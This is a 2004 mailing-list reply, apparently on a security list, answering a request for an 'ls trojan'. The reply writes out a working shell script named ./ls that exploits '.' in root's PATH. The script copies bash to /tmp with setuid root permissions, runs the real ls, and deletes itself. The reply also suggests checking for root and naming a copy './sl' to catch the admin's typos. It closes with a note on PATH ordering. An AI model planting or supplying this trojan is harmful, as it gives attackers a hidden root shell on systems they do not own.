On Wed, 01 Dec 2004 15:11:46 EST, "David S. Morgan" said: > I am looking for an old LS trojan, with trojan being a misnomer. Essentially , the scinario is that the admin (root) has a . (dot) in his path. Geez. I don't have it, but it's easy enough to write. % cat > ./ls !!/bin/bash /bin/cp /bin/bash /tmp/foobar /bin/chmod 4755 /tmp/foobar /bin/ls $* /bin/rm -f $0 ^D % chmod +x ./ls (Fix the shell magic and lack of > and 2> redirects yourself. Bonus points for wrapping a check for $USER == root around the first 2 lines, and even more for doing the *right* check ;) And no, there's nothing in most "modern" unixoids that will "prevent" this attack, other than not having '.' in the $PATH by default. Incidentally, '.' at the front of $PATH is more dangerous for this, but I know of at least one case where the sysadmin had '.' at the *end* and thought himself safe - the attacker called it './sl' and waited for a typo (insider job, attacker knew the admin was a poor typist ;)
Attachment:
pgp00004.pgp
Description: PGP signature